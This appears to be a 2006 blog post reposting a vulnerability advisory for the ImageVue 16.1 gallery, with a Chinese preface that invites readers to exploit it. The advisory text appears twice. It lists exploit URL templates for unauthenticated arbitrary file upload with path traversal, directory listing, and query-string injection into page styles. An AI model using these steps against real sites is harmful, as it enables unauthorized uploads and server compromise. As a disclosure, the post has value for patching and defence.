2006-02-18 11:26:39 by: h4x0r
ImageVue 16.1 upload script vulberability
我英语水平有限,就发原文上来了,有点常识的都应该能看懂如何利用吧?
ImageVue is an online Flash gallery for viewing images. For more information about ImageVue visit http://www.imagevuex.com
Credits: me
Vulnerable Systems:
imageVue16.1
In ImageVue one can upload images to the Gallery. The upload-script however isn't checking credentials nor does it check file extensions i.e. it's possible for any user to upload any file as long as the 'right' permissions have been set for the uploading folder.
Exploit:
1) check folder permissions
http://[target]/dir.php
An XML-document is shown containing all folders and their permissions.
2) upload a file to a folder from the XML
http://[target]/admin/upload.php?path=../[foldername]
Now you're ready to upload any file.
Other vulnerabilities:
1) view dir listings
http://[target]/readfolder.php?path=[path]&ext=[extension]
2) querystring is passed to style and body
http://[target]/index.php?bgcol=[input]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=596
ImageVue is an online Flash gallery for viewing images. For more information about ImageVue visit http://www.imagevuex.com
Credits: me
Vulnerable Systems:
imageVue16.1
In ImageVue one can upload images to the Gallery. The upload-script however isn't checking credentials nor does it check file extensions i.e. it's possible for any user to upload any file as long as the 'right' permissions have been set for the uploading folder.
Exploit:
1) check folder permissions
http://[target]/dir.php
An XML-document is shown containing all folders and their permissions.
2) upload a file to a folder from the XML
http://[target]/admin/upload.php?path=../[foldername]
Now you're ready to upload any file.
Other vulnerabilities:
1) view dir listings
http://[target]/readfolder.php?path=[path]&ext=[extension]
2) querystring is passed to style and body
http://[target]/index.php?bgcol=[input]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=596
There is no comment on this article.
